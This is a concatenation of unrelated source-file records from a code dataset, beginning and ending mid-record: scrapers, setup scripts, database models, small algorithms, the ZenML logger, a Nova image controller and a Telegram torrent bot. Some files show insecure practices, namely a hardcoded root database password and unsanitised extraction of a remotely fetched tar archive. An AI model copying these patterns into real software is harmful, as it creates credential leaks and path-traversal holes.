BeautifulSoup(response.text, \"html.parser\")\n\ntext = soup.findAll('span')\n\n# For debugging purposes\ndef test_scrape():\n # Test the output of scraper\n current_line = 0\n for line in text:\n if line.string is not None:\n if \"Självstudier\" in line.string or \"påsk\" in line.string:\n print(text[current_line + 2].string)\n current_line = current_line + 1\n\n\n# Iterate through text to find specific lines which are then used to determine\n# the position of sought dates. Dumps the results as a json-formatted object\n# in source directory in a txt file\ndef scrape():\n # Store dates when a period starts\n data = {}\n current_line = 0\n for line in text:\n if line.string is not None:\n if \"Läsperiod\" in line.string:\n # print(text[current_line + 2].string)\n data[text[current_line + 2].string] = \"study_period\"\n # data.append((text[current_line + 2].string, \"study_period\"))\n if \"Tentamensperiod\" in line.string:\n # print(text[current_line + 2].string)\n # data.append((text[current_line + 2].string, \"exam_period\"))\n data[text[current_line + 2].string] = \"exam_period\"\n # if \"Omtentamensperiod\" in line.string:\n # print(text[current_line + 2].string)\n # data.append((text[current_line + 2].string, \"reexam_period\"))\n # data[text[current_line + 2].string] = \"reexam_period\"\n current_line = current_line + 1\n with open('data.txt', 'w') as outfile:\n outfile.write(json.dumps(data))\n\n\nif __name__ == '__main__':\n # test_scrape()\n scrape()\n","sub_path":"lasvecka-python/lasveckor_scraper.py","file_name":"lasveckor_scraper.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"504941422","text":"from setuptools import find_packages, setup\n\nPACKAGE = 'qgantt'\n\n# name can be any name. 
This name will be used to create .egg file.\n# name that is used in packages is the one that is used in the trac.ini file.\n# use package name as entry_points\nsetup(\n name='QGantt', version='0.1',\n author = \"Senmiao Liu\",\n author_email = \"liusenmiao@360quan.com\",\n description = \"Render gantt chart from ticket system using FusionCharts.\",\n license = \"GPLv3\",\n packages=find_packages(exclude=['*.tests*']),\n entry_points={'trac.plugins': '%s = %s' % (PACKAGE, PACKAGE)},\n package_data={'qgantt': ['templates/*', 'htdocs/fc/*',\n 'htdocs/css/*', 'htdocs/js/*']},\n)\n","sub_path":"qgantt/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"524831080","text":"name = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\nhandle = open('files/'+name)\nhrs=list()\ncount=dict()\nfor line in handle:\n if line.startswith(\"From \"):\n line.rstrip()\n words= line.split()\n time=words[5].split(\":\")\n hrs.append(time[0])\nfor hour in hrs:\n count[hour]=count.get(hour,0)+1\ntmp=sorted([(k,v) for k,v in count.items()])\nfor k,v in tmp:\n print(k,v)\n","sub_path":"tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"631693191","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Build import cythonize\n\nimport numpy\nimport subprocess\nimport os\nsubprocess.check_call(\"make\")\n\nimport numpy # noqa\n\n\ndef read_from_makefile(field):\n data = [line for line in open(\"kernel/Makefile\").readlines() if line.startswith(field)][0]\n data = \"=\" .join(data.split(\"=\")[1:])\n data = data.strip()\n data = data.split(\" \")\n return data\n\n\nobjects = [\"kernel/\"+obj for obj in 
read_from_makefile(\"OBJ\")]\nextra_compile_args = read_from_makefile(\"CXXFLAGS\")\n\n# replace $(EXTRAFLAGS) in extra_compile_args with environment variable\ntry:\n del extra_compile_args[extra_compile_args.index(\"$(EXTRAFLAGS)\")]\nexcept ValueError:\n pass\nextra_compile_args += os.environ.get('EXTRAFLAGS', \"\").split()\n# extra_compile_args += [\"-DCYTHON_TRACE=1\"]\n\nkwds = {\n \"language\": \"c++\",\n \"extra_compile_args\": extra_compile_args,\n \"extra_link_args\": objects,\n \"libraries\": [\"gmp\", \"pthread\"],\n \"include_dirs\": [numpy.get_include()],\n}\n\nextensions = [\n Extension(\"g6k.siever\", [\"g6k/siever.pyx\"], **kwds),\n Extension(\"g6k.siever_params\", [\"g6k/siever_params.pyx\"], **kwds)\n]\n\nsetup(\n name=\"G6K\",\n version=\"0.0.1\",\n ext_modules=cythonize(extensions, compiler_directives={'binding': True,\n 'embedsignature': True,\n 'language_level': 2}),\n packages=[],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"2042992","text":"from sqlalchemy import *\nfrom migrate import *\n\n\nfrom migrate.changeset import schema\npre_meta = MetaData()\npost_meta = MetaData()\ncomissions = Table('comissions', post_meta,\n Column('id', Integer, primary_key=True, nullable=False),\n Column('public_key_xQ', BigInteger),\n Column('public_key_yQ', BigInteger),\n Column('secret_key_xQ', BigInteger),\n Column('secret_key_yQ', BigInteger),\n)\n\n\ndef upgrade(migrate_engine):\n # Upgrade operations go here. 
Don't create your own engine; bind\n # migrate_engine to your metadata\n pre_meta.bind = migrate_engine\n post_meta.bind = migrate_engine\n post_meta.tables['comissions'].create()\n\n\ndef downgrade(migrate_engine):\n # Operations to reverse the above upgrade go here.\n pre_meta.bind = migrate_engine\n post_meta.bind = migrate_engine\n post_meta.tables['comissions'].drop()\n","sub_path":"db_repository/versions/016_migration.py","file_name":"016_migration.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542383357","text":"from sqlalchemy import (\n MetaData, Table, Column, ForeignKey,\n Integer, String, Date,Boolean,\n PrimaryKeyConstraint, UniqueConstraint, ForeignKeyConstraint)\n\nmetadata = MetaData()\n\n\nusers = Table(\n 'users', metadata,\n Column('id', Integer, nullable=False),\n Column('login', String(256), nullable=False),\n Column('passwd', String(256), nullable=False),\n Column('is_superuser', Boolean, nullable=False, server_default='FALSE'),\n Column('disabled', Boolean, nullable=False, server_default='FALSE'),\n\n # indices\n PrimaryKeyConstraint('id', name='user_pkey'),\n UniqueConstraint('login', name='user_login_key'),\n)\n\n\npermissions = Table(\n 'permissions', metadata,\n Column('id', Integer, nullable=False),\n Column('user_id', Integer, nullable=False),\n Column('perm_name', String(64), nullable=False),\n\n # indices\n PrimaryKeyConstraint('id', name='permission_pkey'),\n ForeignKeyConstraint(['user_id'], [users.c.id], name='user_permission_fkey', ondelete='CASCADE'),\n)\nbots = Table(\n 'bots', metadata,\n Column('id', Integer, nullable=False),\n Column('user_id', Integer, nullable=False),\n Column('telegram_token', String(128), nullable=False),\n Column('bot_name', String(64), nullable=False),\n Column('webhook', String(256), nullable=False),\n # indices\n PrimaryKeyConstraint('id', name='bot_pkey'),\n ForeignKeyConstraint(['user_id'], 
[users.c.id], name='user_bot_fkey', ondelete='CASCADE'),\n\n)\nbot_options = Table(\n 'bot_options', metadata,\n Column('id', Integer, nullable=False),\n Column('bot_id', Integer, nullable=False),\n Column('perm_name', String(64), nullable=False),\n\n # indices\n PrimaryKeyConstraint('id', name='bot_options_pkey'),\n ForeignKeyConstraint(['bot_id'], [bots.c.id]\n , name='bot_option_fkey', ondelete='CASCADE'),\n\n)\n\n","sub_path":"robo_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"513781044","text":"import datetime\nimport time\n\nimport pandas as pd\n\nimport pymysql\n\n\ndef get_day_list():\n day_list = []\n datestart = datetime.datetime.strptime(start_day, '%Y-%m-%d')\n dateend = datetime.datetime.strptime(end_day, '%Y-%m-%d')\n d = datestart\n delta = datetime.timedelta(days=1)\n while d <= dateend:\n # print(d.strftime(\"%Y-%m-%d\"))\n day = d.strftime(\"%Y-%m-%d\")\n day_list.append(day)\n d += delta\n return day_list\n\n\nif __name__ == '__main__':\n start_day = '2019-01-24'\n end_day = '2019-02-10'\n # end_day = '2019-01-26'\n db = pymysql.connect(\"192.168.103.31\", \"root\", \"adminadmin\", \"hotpot\")\n cursor = db.cursor()\n # 获取起止时间的时间范围\n day_list = get_day_list()\n data_list = []\n filename = '海底捞门店数' + str(int(time.time())) + '.csv'\n for change_day in day_list:\n sql = \"\"\"SELECT storeId,storeName,city,city_level from SHOP_DETAIL WHERE storeId in (select DISTINCT storeId from SHOP_WAITE WHERE crawlTime='%s') GROUP BY storeId ;\"\"\" % change_day\n cursor.execute(sql)\n results = cursor.fetchall()\n df = pd.DataFrame(list(results))\n df['crawlTime'] = change_day\n df.to_csv(filename, mode='a', header=False, index=False)\n csv_data = pd.read_csv(filename,engine='python') # 再去读信息\n csv_data.to_excel('海底捞门店数.xlsx', 
index=False)\n","sub_path":"IDGdemo/数据库整理/海底捞/4.海底捞获取门店数.py","file_name":"4.海底捞获取门店数.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275535823","text":"\"\"\"\n.\n\"\"\"\n\n# input\nalphabet = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\"]\nk = 3\n\n# compute\nkmers = alphabet[:]\nfor _ in range(k-1):\n \n new_kmers = []\n for kmer in kmers:\n for char in alphabet:\n new_kmers.append(kmer+char)\n kmers = new_kmers[:]\n\n# out\nprint(\"\\n\".join(kmers))","sub_path":"Enumerate_Kmers_Lexic/enumerate_kmers_lex.py","file_name":"enumerate_kmers_lex.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"52141704","text":"import numpy as np\nimport sys\n\n\ndef read_vetices(filename):\n '''\n :param filename: obj file\n :return: a list of [x,y,z] from lines of vertices alone\n '''\n lines = open(filename).read().splitlines()\n vertices = [line.split()[1:] for line in lines if line.split()[0] == 'v']\n return vertices\n\n\ndef read_faces(filename):\n lines = open(filename).read().splitlines()\n faces = [line.split()[1:] for line in lines if line.split()[0] == 'f']\n faces_coord = []\n for i in faces:\n coord = [int(j.split('/')[0]) for j in i]\n faces_coord.append(coord)\n return faces_coord\n\n\n# def threes_from_all_vertices(vertices):\n# '''\n# change~!\n# :param vertices: a list of [x,y,z] of vertices\n# :return: threes of vertices\n# '''\n# n = len(vertices)\n# threes = [vertices[i:i+3] for i in range(0, n-2, 3)]\n# return threes\n\ndef threes_from_all_vertices(vertices, faces_coord):\n '''\n :param vertices: all vertices from file in order\n :param faces_coord: threes of coordinates of vertices in each face\n :return: threes of vertices according to faces\n '''\n threes=[]\n for i in faces_coord:\n 
threes.append([vertices[i[0]-1],vertices[i[1]-1],vertices[i[2]-1]])\n return threes\n\n\ndef normal_for_vertices(v1, v2, v3):\n '''\n :param v1: x\n :param v2: y\n :param v3: z\n :return: normal\n '''\n a = v1 - v2\n b = v1 - v3\n return np.cross(a, b)\n\n\ndef normals_for_all_vertices(threes):\n '''\n :param threes: threes of vertices, defining polygons\n :return: list of normals, normal for each polygon\n '''\n normals=[]\n for vvec in threes:\n v1 = np.array([float(i) for i in vvec[0]])\n v2 = np.array([float(i) for i in vvec[1]])\n v3 = np.array([float(i) for i in vvec[2]])\n normals.append(normal_for_vertices(v1, v2, v3))\n return normals\n\n\ndef areas(threes):\n # calculate area per polygon\n # Todo\n pass\n\n\ndef normalized_normals(normals):\n '''\n :param normals: the perpendicular vectors\n :return: normalized\n '''\n nn = []\n w = []\n for i in normals:\n normi = np.linalg.norm(i)\n if normi == 0:\n normalized_i = i\n else:\n normalized_i = i / normi\n nn.append(normalized_i)\n w.append(normi)\n return nn, w\n\n\ndef normals_for_file(filename):\n '''\n :param filename: the name of obj file\n :return: all the normalized normals from the file\n '''\n vertices = read_vetices(filename)\n faces = read_faces(filename)\n threes = threes_from_all_vertices(vertices, faces)\n normals = normals_for_all_vertices(threes)\n nn, w = normalized_normals(normals)\n return nn, w\n\n#print(normals_for_file('/home/stav/Downloads/1a2a5a06ce083786581bb5a25b17bed6.obj'))\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Error: filename missing')\n exit(1)\n filename = sys.argv[1]\n print(normals_for_file(filename))\n\n\n\n","sub_path":"PolygonMesh/polygon_normals.py","file_name":"polygon_normals.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"265111380","text":"#pancake sorting\n#used for the problem of sorting a disordered stack of pancakes in order by 
size\n#Spatula can be placed anywhere in the stack to flip pancakes\n#a pancake number is the minimum number of flips required for a given number of pancakes\n#the goal is to sort in as few flips as possible\n\n#reverse array [0..i]\ndef flip(arr, i):\n start = 0\n while start < i:\n tmp = arr[start]\n arr[start] = arr[i]\n arr[i] = tmp\n start += 1\n i -= 1\n\n#get index of max elemt in array [0..n-1]\ndef getMax(arr, n):\n maxIndex = 0\n for i in range(0,n):\n if arr[i] > arr[maxIndex]:\n maxIndex = i\n return maxIndex\n\n#main function that sorts\ndef pancakeSort(arr, n):\n size = n\n while size >1:\n maxIndex = getMax(arr, size)\n if maxIndex != size-1:\n flip(arr, maxIndex)\n flip(arr, size-1)\n size -= 1\n","sub_path":"algorithms/sorting/pancake_sort.py","file_name":"pancake_sort.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"26860259","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nindex = np.array([0,1,2,3,4,5,6])\r\ncolumns = np.array(['Name','Age','Gender','Show'])\r\ndata = [\r\n ['John',10,'M','Kidzee'],\r\n ['Jinny',10,'F','Kidone'],\r\n ['Castor',11,'M','Kidkill'],\r\n ['Troy',12,'M','Kidkill'],\r\n ['Angel',9,'F','Kidmoon'],\r\n ['Gretel',11,'M','Kidhorror'],\r\n ['Elv',15,'F','Kidzee'],\r\n]\r\ndf = pd.DataFrame(index=index, columns=columns,data=data)\r\nprint(df)\r\n# To get only girls performance\r\n# df = df[df['Gender']=='F']\r\n# To get only boys performance\r\n# df = df[df['Gender']=='M']\r\n# To get only girls performance whose age is >10\r\n# df = df[(df['Age']>10) & (df['Gender']=='F')]\r\n# df = df[df['Gender']=='M'][['Name','Age']]\r\n# To change the index\r\n# df.set_index('Show',inplace=True)\r\n# df = df.set_index('Show')\r\n# 
print(df)","sub_path":"Pandas/DFOperations.py","file_name":"DFOperations.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"439429732","text":"# Copyright (c) ZenML GmbH 2020. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\nimport logging\nimport os\nimport re\nimport sys\nfrom logging.handlers import TimedRotatingFileHandler\nfrom typing import Any, Dict\n\nfrom absl import logging as absl_logging\n\nfrom zenml.constants import ZENML_LOGGING_VERBOSITY\nfrom zenml.enums import LoggingLevels\n\nfrom zenml.constants import ( # isort: skip\n ABSL_LOGGING_VERBOSITY,\n APP_NAME,\n)\n\n\nclass CustomFormatter(logging.Formatter):\n \"\"\"Formats logs according to custom specifications.\"\"\"\n\n grey: str = \"\\x1b[38;21m\"\n pink: str = \"\\x1b[35m\"\n green: str = \"\\x1b[32m\"\n yellow: str = \"\\x1b[33;21m\"\n red: str = \"\\x1b[31;21m\"\n bold_red: str = \"\\x1b[31;1m\"\n purple: str = \"\\x1b[1;35m\"\n reset: str = \"\\x1b[0m\"\n\n format_template: str = (\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s (%(\"\n \"filename)s:%(lineno)d)\"\n if LoggingLevels[ZENML_LOGGING_VERBOSITY] == LoggingLevels.DEBUG\n else \"%(message)s\"\n )\n\n COLORS: Dict[LoggingLevels, str] = {\n LoggingLevels.DEBUG: grey,\n LoggingLevels.INFO: purple,\n LoggingLevels.WARN: yellow,\n LoggingLevels.ERROR: red,\n LoggingLevels.CRITICAL: bold_red,\n }\n\n def 
format(self, record: logging.LogRecord) -> str:\n \"\"\"Converts a log record to a (colored) string\n\n Args:\n record: LogRecord generated by the code.\n\n Returns:\n A string formatted according to specifications.\n \"\"\"\n log_fmt = (\n self.COLORS[LoggingLevels[ZENML_LOGGING_VERBOSITY]]\n + self.format_template\n + self.reset\n )\n formatter = logging.Formatter(log_fmt)\n formatted_message = formatter.format(record)\n quoted_groups = re.findall(\"`([^`]*)`\", formatted_message)\n for quoted in quoted_groups:\n formatted_message = formatted_message.replace(\n \"`\" + quoted + \"`\",\n \"`\"\n + self.reset\n + self.yellow\n + quoted\n + \"`\"\n + self.COLORS.get(LoggingLevels[ZENML_LOGGING_VERBOSITY]),\n )\n return formatted_message\n\n\nLOG_FILE = f\"{APP_NAME}_logs.log\"\n\n\ndef get_logging_level() -> LoggingLevels:\n \"\"\"Get logging level from the env variable.\"\"\"\n verbosity = ZENML_LOGGING_VERBOSITY.upper()\n if verbosity not in LoggingLevels.__members__:\n raise KeyError(\n f\"Verbosity must be one of {list(LoggingLevels.__members__.keys())}\"\n )\n return LoggingLevels[verbosity]\n\n\ndef set_root_verbosity() -> None:\n \"\"\"Set the root verbosity.\"\"\"\n level = get_logging_level()\n if level != LoggingLevels.NOTSET:\n logging.basicConfig(level=level.value)\n get_logger(__name__).debug(\n f\"Logging set to level: \" f\"{logging.getLevelName(level.value)}\"\n )\n else:\n logging.disable(sys.maxsize)\n logging.getLogger().disabled = True\n get_logger(__name__).debug(\"Logging NOTSET\")\n\n\ndef get_console_handler() -> Any:\n \"\"\"Get console handler for logging.\"\"\"\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(CustomFormatter())\n return console_handler\n\n\ndef get_file_handler() -> Any:\n \"\"\"Return a file handler for logging.\"\"\"\n file_handler = TimedRotatingFileHandler(LOG_FILE, when=\"midnight\")\n file_handler.setFormatter(CustomFormatter())\n return file_handler\n\n\ndef 
get_logger(logger_name: str) -> logging.Logger:\n \"\"\"Main function to get logger name,.\n\n Args:\n logger_name: Name of logger to initialize.\n\n Returns:\n A logger object.\n\n \"\"\"\n logger = logging.getLogger(logger_name)\n logger.setLevel(get_logging_level().value)\n logger.addHandler(get_console_handler())\n\n # TODO [ENG-130]: Add a file handler for persistent handling\n # logger.addHandler(get_file_handler())\n # with this pattern, it's rarely necessary to propagate the error up to\n # parent\n logger.propagate = False\n return logger\n\n\ndef init_logging() -> None:\n \"\"\"Initialize logging with default levels.\"\"\"\n # Mute tensorflow cuda warnings\n os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n set_root_verbosity()\n\n # Mute apache_beam\n logging.getLogger(\"apache_beam\").setLevel(logging.WARNING)\n logging.getLogger(\"rdbms_metadata_access_object\").setLevel(logging.WARNING)\n\n # set absl logging\n absl_logging.set_verbosity(ABSL_LOGGING_VERBOSITY)\n","sub_path":"src/zenml/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"557609305","text":"# Copyright 2012 Cloudscaling Group, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\nimport os\nimport os.path\nimport tarfile\nimport tempfile\nimport urllib2\nimport webob\n\nfrom nova import exception\nfrom nova.api.gce.views import operations as operations_view\nfrom nova.api.gce.views import images as images_view\nfrom nova.api.gce import wsgi as gce_wsgi\nfrom nova.api.openstack import wsgi as openstack_wsgi\nfrom nova.image import glance\n\n\nclass Controller(openstack_wsgi.Controller):\n\n _view_builder_class = images_view.ViewBuilder\n\n def __init__(self, **kwargs):\n super(Controller, self).__init__(**kwargs)\n self._image_service = glance.get_default_image_service()\n\n def index(self, req):\n images = self._get_images(req)\n return self._view_builder.index(req, images)\n\n def show(self, req, id):\n \"\"\"Return data about the given image name.\"\"\"\n context = self.get_context(req)\n try:\n image = self._image_service.show(context, id)\n return self._view_builder.basic(req, image)\n except exception.NotFound:\n raise webob.exc.HTTPNotFound()\n\n def delete(self, req, id):\n \"\"\"Delete an image, if allowed.\"\"\"\n context = self.get_context(req)\n try:\n self._image_service.delete(context, id)\n except exception.ImageNotFound:\n explanation = _(\"Image not found.\")\n raise webob.exc.HTTPNotFound(explanation=explanation)\n return webob.exc.HTTPNoContent()\n\n def create(self, req, body):\n context = self.get_context(req)\n\n name = body['name']\n desc = body.get('description')\n image_ref = body['rawDisk']['source']\n resp = urllib2.urlopen(image_ref)\n tar = tempfile.TemporaryFile()\n tar.write(resp.read())\n tar.seek(0)\n tar_file = tarfile.open(fileobj=tar)\n member = tar_file.next()\n if member is None:\n msg = _(\"TAR-file is empty\")\n return webob.exc.HTTPBadRequest(explanation=msg)\n img_filename = member.name\n tar_file.extract(member, tempfile.gettempdir())\n img_filename = 
os.path.join(tempfile.gettempdir(), img_filename)\n location = 'file://' + img_filename\n img_file = open(img_filename, 'rb')\n meta = {'name': name,\n 'disk_format': 'raw',\n 'container_format': 'bare',\n 'min_disk': 0,\n 'min_ram': 0}\n image = self._image_service.create(context, meta, img_file)\n\n tar_file.close()\n img_file.close()\n tar.close()\n\n target_link = self._view_builder._get_links(req,\n image['id'],\n self._view_builder._collection_name)\n operation_type = 'insert'\n os.remove(img_filename)\n return operations_view.generate_operation(req,\n target_link, operation_type)\n\n def _get_images(self, req):\n context = self.get_context(req)\n images = self._image_service.detail(context)\n return images\n\n def get_context(self, req):\n return req.environ['nova.context']\n\n\ndef create_resource():\n return gce_wsgi.GCEResource(Controller())\n","sub_path":"nova/api/gce/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"626221514","text":"import torchvision.transforms as transforms\nimport functools\nfrom classification import labels\nfrom typing import Dict\nfrom nltk.corpus import wordnet\n\n# Normalize function for mean + standard deviation\n# used for all imagenet images.\n# Transforms the array into a normalized RGB array\nnormalize_transform = transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n)\n\n\n# Used to compress the image to a max of 256 edge pixels\nimage_edge_length = 256\n\n\n# Slightly smaller crop of the compressed image for processing\ncrop_size = 224\n\n\nclass Label:\n id: str\n name: str\n uri: str\n\n def __init__(self, id: str, name: str, uri: str):\n self.id = id\n self.syn = wordnet.of2ss(id)\n self.name = name\n self.uri = uri\n\n def is_a(self, synset) -> bool:\n if self.syn == synset:\n return True\n hypernyms = self.syn.hypernyms()\n while synset not in hypernyms:\n 
hypernyms = hypernyms[0].hypernyms()\n if hypernyms == []:\n return False\n return synset in hypernyms\n\n\n\n@functools.lru_cache(maxsize=1, typed=False)\ndef get_labels() -> [Label]:\n result = []\n for i in range(1000):\n label_dic = labels.labels.get(i)\n label = Label(\n id=label_dic['id'],\n name=label_dic['label'],\n uri=label_dic['uri']\n )\n result.append(label)\n return result\n","sub_path":"classification/imagenet.py","file_name":"imagenet.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"544816684","text":"import grid_utils\nimport colors\nimport math\nfrom operator import attrgetter\nimport time\nfrom algorithms import algorithm_utils\n\n\n\ndef start_search(grid, PATHFINDER_DELAY, SHORTEST_PATH_DELAY):\n\n\n # get the start position and end position\n for row in grid:\n for square in row:\n if square.state == \"start_pos\":\n start_pos = square\n\n elif square.state == \"end_pos\":\n end_pos = square\n\n\n grid_utils.clean_grid(grid)\n\n\n start_pos.gScore = algorithm_utils.find_g(start_pos, start_pos)\n start_pos.hScore = algorithm_utils.find_h(start_pos, end_pos)\n start_pos.fScore = algorithm_utils.find_f(start_pos.gScore, start_pos.hScore)\n\n\n openList = [start_pos]\n closedList = []\n\n\n\n while len(openList) > 0:\n\n\n current_node = algorithm_utils.get_lowest_f_node(openList)\n\n openList.remove(current_node)\n closedList.append(current_node)\n\n\n\n if current_node.state == \"end_pos\":\n\n time.sleep(0.02)\n\n path = [end_pos]\n node = current_node\n while node.parent != None:\n time.sleep(SHORTEST_PATH_DELAY)\n node = node.parent\n path.append(node)\n if node != end_pos:\n node.color = colors.GREEN\n\n node.backtrack = True\n\n\n start_pos.color = colors.RED\n end_pos.color = colors.RED\n return\n\n if current_node == start_pos:\n current_node.color = colors.RED\n else:\n current_node.color = colors.ORANGE\n current_node.found = 
True\n\n\n\n time.sleep(PATHFINDER_DELAY)\n\n x = current_node.x\n y = current_node.y\n\n # get nodes around current node\n node1 = grid[x][y - 1]\n node2 = grid[x][y + 1]\n node3 = grid[x - 1][y]\n node4 = grid[x + 1][y]\n\n successor_nodes = [node1, node2, node3, node4]\n\n for node in successor_nodes:\n\n\n # check if walkable\n if (node.state == \"wall\") or (node in closedList):\n continue\n\n\n hypo_fscore = current_node.gScore + 1\n node_is_better_than_current = False\n\n if node not in openList:\n node_is_better_than_current = True\n node.hScore = 0\n openList.append(node)\n\n elif hypo_fscore < node.gScore:\n node_is_better_than_current = True\n\n if node_is_better_than_current == True:\n node.parent = current_node\n node.gScore = hypo_fscore\n node.fScore = node.gScore + node.hScore\n\n\n\n\n print(\"Path Not Found\")\n\n\n for node in closedList:\n if node.state == \"wall\":\n continue\n elif node == start_pos:\n node.color = colors.GREEN\n else:\n node.backtrack = True\n node.turn_red = True\n","sub_path":"algorithms/diekstra.py","file_name":"diekstra.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"70328535","text":"# -*- encoding: utf-8 -*-\nimport telegram\nimport ConfigParser\nimport time\nimport codecs\nimport random\nfrom bs4 import BeautifulSoup\nfrom urllib2 import urlopen, URLError\n\n\nconfig = ConfigParser.RawConfigParser()\nconfig.read('settings.cfg')\n\nINTERVAL = int(config.get('Telegram', 'INTERVAL'))\nADMIN_ID = int(config.get('Telegram', 'ADMIN_ID'))\nbot = telegram.Bot(token=config.get('Telegram', 'TOKEN'))\n\nMOVIES = config.get('RT', 'MOVIES')\nURL_RUTOR = config.get('RT', 'URL_RUTOR')\nURL_FILMS = URL_RUTOR + config.get('RT', 'URL_FILMS')\nFILTER = [e for e in config.get('RT', 'FILTER').split(',')]\nNOTIFICATION_INTERVAL = int(config.get('RT', 'NOTIFICATION_INTERVAL'))\nBANNED_FILE = config.get('RT', 'BANNED')\nBANNED = []\nlast_time 
= None\n\n\ndef main():\n global last_time, BANNED\n try:\n update_id = bot.getUpdates()[0].update_id\n except IndexError:\n update_id = None\n\n BANNED = get_list_from_file(BANNED_FILE)\n while True:\n try:\n update_id = check_updates(update_id)\n now = time.time()\n if last_time is None or now - last_time >= NOTIFICATION_INTERVAL:\n check_movies()\n last_time = now\n time.sleep(1)\n time.sleep(INTERVAL)\n except telegram.TelegramError as e:\n if e.message in (\"Bad Gateway\", \"Timed out\"):\n time.sleep(1)\n elif e.message == \"Unauthorized\":\n update_id += 1\n else:\n raise e\n except URLError as ex:\n time.sleep(300)\n\n\ndef check_updates(update_id):\n for update in bot.getUpdates(offset=update_id, timeout=10):\n chat_id = update.message.chat_id\n update_id = update.update_id + 1\n message = update.message.text\n if message and chat_id == ADMIN_ID:\n run_command(chat_id, message)\n elif message and chat_id != ADMIN_ID:\n bot.sendMessage(chat_id=chat_id, text='You\\'re not autorized to use me!')\n bot.sendMessage(chat_id=ADMIN_ID, text='Someone tried to use me!')\n return update_id\n\n\ndef get_list_from_file(file):\n f = open(file)\n list = f.readlines()\n f.close()\n return list\n\n\ndef get_text_from_file(file):\n f = open(file)\n list = f.read()\n f.close()\n return list\n\n\ndef check_movies():\n f = codecs.open(MOVIES)\n list = f.readlines()\n f.close()\n check_rutor(list)\n\n\ndef check_rutor(movies):\n for movie in movies:\n req = movie.replace(' ', '%20').rstrip('\\n')\n url = URL_FILMS + req\n page = urlopen(url)\n soup = BeautifulSoup(page.read(), 'html.parser')\n results = soup.find_all('tr', {'class': ['gai', 'tum']})\n for result in results:\n all_tds = result.find_all('td')\n second_td_as = all_tds[1].find_all('a')\n naming_link = second_td_as[2]\n direct_link = second_td_as[0]['href']\n id = direct_link.split('/')[-1]\n size = all_tds[3].get_text('', strip=True)\n if len(result) > 0 and check(naming_link):\n bot.sendMessage(chat_id=ADMIN_ID,\n 
